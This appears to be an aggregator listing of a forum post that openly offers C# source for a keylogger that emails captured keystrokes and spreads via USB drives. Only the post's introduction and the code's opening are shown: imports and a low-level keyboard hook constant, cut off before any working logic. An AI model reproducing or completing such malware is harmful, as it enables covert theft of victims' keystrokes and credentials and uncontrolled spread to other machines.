Quantcast
Channel: Go4Expert
Viewing all articles
Browse latest Browse all 1987

Keylogger + Email + USB Spread Written in C#

$
0
0
This is a keylogger + email + usb spread written in c#
I can not take full credit for this program. Creds to the original author.
I have modified it a bit, but you get the idea.

Code:
using System;
using System.Diagnostics;
using System.Timers;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
using System.Net;
using System.Net.Mail;
using Microsoft.Win32;

namespace Keylogger_V2
{
    class Program
    {
        private const int WH_KEYBOARD_LL = 13;...
Keylogger + Email + USB Spread Written in C#

Viewing all articles
Browse latest Browse all 1987

Trending Articles